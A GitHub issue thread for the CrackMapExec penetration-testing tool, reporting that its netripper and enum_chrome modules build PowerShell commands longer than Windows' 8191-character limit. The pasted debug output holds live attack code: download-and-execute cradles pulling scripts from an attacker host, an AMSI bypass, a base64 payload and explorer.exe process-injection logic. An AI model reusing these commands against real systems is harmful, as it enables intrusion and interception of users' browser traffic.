### ISSUE TITLE
Command exceeds maximum length of 8191 chars

### ISSUE THREAD

**Issue by gman0x00** [byt3bl33d3r/CrackMapExec#223]
## Steps to reproduce

1. Use the met_inject module in an attempt to spawn a meterpreter shell on a system
2. Receive a length error and cme hangs.

## Command string used
cme smb ip -u user -p pass -M netripper -o PROCESS=chrome
cme smb ip -u user -p pass -M enum_chrome

## CME verbose output (using the --verbose flag)
DEBUG Passed args:
{'clear_obfscripts': False,
 'content': False,
 'cred_id': [],
 'darrell': False,
 'depth': None,
 'disks': False,
 'domain': None,
 'exclude_dirs': '',
 'exec_method': None,
 'execute': None,
 'fail_limit': None,
 'force_ps32': False,
 'gen_relay_list': None,
 'gfail_limit': None,
 'groups': None,
 'hash': [],
 'jitter': None,
 'list_modules': False,
 'local_auth': False,
 'local_groups': None,
 'loggedon_users': False,
 'lsa': False,
 'module': 'netripper',
 'module_options': ['PROCESS=chrome'],
 'no_output': False,
 'ntds': None,
 'obfs': False,
 'only_files': False,
 'pass_pol': False,
 'password': ['password'],
 'pattern': None,
 'port': 445,
 'protocol': 'smb',
 'ps_execute': None,
 'regex': None,
 'rid_brute': None,
 'sam': False,
 'server': 'https',
 'server_host': '0.0.0.0',
 'server_port': None,
 'sessions': False,
 'share': 'C$',
 'shares': False,
 'show_module_options': False,
 'spider': None,
 'spider_folder': '.',
 'target': ['192.168.0.218'],
 'threads': 100,
 'timeout': None,
 'ufail_limit': None,
 'username': ['user'],
 'users': None,
 'verbose': True,
 'wmi': None,
 'wmi_namespace': 'root\\cimv2'}
NETRIPPE...                                         [*] This module will not exit until CTRL-C is pressed
NETRIPPE...                                         [*] Logs will be stored in ~/.cme/logs

DEBUG Config file parsed
DEBUG Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
DEBUG Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
DEBUG Config file parsed
DEBUG Config file parsed
DEBUG CME server type: https
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode.
DEBUG Generated PS IEX Launcher:
 [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
IEX (New-Object Net.WebClient).DownloadString('https://192.168.0.205:443/Invoke-NetRipper.ps1')
Invoke-NetRipper -LogLocation \\192.168.0.205\DFWVY\netripper_192.168.0.218\ -ProcessName chrome

DEBUG Generated PS IEX Launcher:
 [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
IEX (New-Object Net.WebClient).DownloadString('https://192.168.0.205:443/Invoke-PSInject.ps1')

$injected = $False
$inject_once = $False
$command = "WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvADEAOQAyAC4AMQA2ADgALgAwAC4AMgAwADUAOgA0ADQAMwAvAEkAbgB2AG8AawBlAC0ATgBlAHQAUgBpAHAAcABlAHIALgBwAHMAMQAnACkACgBJAG4AdgBvAGsAZQAtAE4AZQB0AFIAaQBwAHAAZQByACAALQBMAG8AZwBMAG8AYwBhAHQAaQBvAG4AIABcAFwAMQA5ADIALgAxADYAOAAuADAALgAyADAANQBcAEQARgBXAFYAWQBcAG4AZQB0AHIAaQBwAHAAZQByAF8AMQA5ADIALgAxADYAOAAuADAALgAyADEAOABcACAALQBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIABjAGgAcgBvAG0AZQA="
$owners = @{}
$console_login = gwmi win32_computersystem | select -exp Username
gwmi win32_process | where {$_.Name.ToLower() -eq 'explorer.exe'.ToLower()} | % {
    if ($_.getowner().domain -and $_.getowner().user){
    $owners[$_.getowner().domain + "\" + $_.getowner().user] = $_.handle
    }
}
try {
    if ($owners.ContainsKey($console_login)){
        Invoke-PSInject -ProcId $owners.Get_Item($console_login) -PoshCode $command
        $injected = $True
        $owners.Remove($console_login)
    }
}
catch {}
if (($injected -eq $False) -or ($inject_once -eq $False)){
    foreach ($owner in $owners.Values) {
        try {
            Invoke-PSInject -ProcId $owner -PoshCode $command
        }
        catch {}
    }
}

DEBUG Generated PS command:
 [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
}catch{}
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
IEX (New-Object Net.WebClient).DownloadString('https://192.168.0.205:443/Invoke-PSInject.ps1')

$injected = $False
$inject_once = $False
$command = "WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvADEAOQAyAC4AMQA2ADgALgAwAC4AMgAwADUAOgA0ADQAMwAvAEkAbgB2AG8AawBlAC0ATgBlAHQAUgBpAHAAcABlAHIALgBwAHMAMQAnACkACgBJAG4AdgBvAGsAZQAtAE4AZQB0AFIAaQBwAHAAZQByACAALQBMAG8AZwBMAG8AYwBhAHQAaQBvAG4AIABcAFwAMQA5ADIALgAxADYAOAAuADAALgAyADAANQBcAEQARgBXAFYAWQBcAG4AZQB0AHIAaQBwAHAAZQByAF8AMQA5ADIALgAxADYAOAAuADAALgAyADEAOABcACAALQBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIABjAGgAcgBvAG0AZQA="
$owners = @{}
$console_login = gwmi win32_computersystem | select -exp Username
gwmi win32_process | where {$_.Name.ToLower() -eq 'explorer.exe'.ToLower()} | % {
    if ($_.getowner().domain -and $_.getowner().user){
    $owners[$_.getowner().domain + "\" + $_.getowner().user] = $_.handle
    }
}
try {
    if ($owners.ContainsKey($console_login)){
        Invoke-PSInject -ProcId $owners.Get_Item($console_login) -PoshCode $command
        $injected = $True
        $owners.Remove($console_login)
    }
}
catch {}
if (($injected -eq $False) -or ($inject_once -eq $False)){
    foreach ($owner in $owners.Values) {
        try {
            Invoke-PSInject -ProcId $owner -PoshCode $command
        }
        catch {}
    }
}

[-] Command exceeds maximum length of 8191 chars (was 1616110). exiting.

## CME Version (cme --version)
4.0.1dev - Bug Pr0n

## OS
Kali 2017.3

## Target OS
Windows 10 Enterprise 16299 x64
## Detailed issue explanation
Command exceeds maximum length of 8191 chars (was 1616110). exiting.
Same deal with enum_chrome module.

**Comment by byt3bl33d3r** [comment]
I've run into this as well. Made some changes in V4.0 that sometimes makes the generated PowerShell commands exceed the windows command length limit. I think I might have a way around this thankfully.

**Comment by HyCore** [comment]
Do we have any update on this, idk if it's the EDR or windows simply blocking this.
This limitation should only apply the the CMD shell & not to powershell. I'm a bit confuse.

**Comment by mpgn** [comment]
module removed
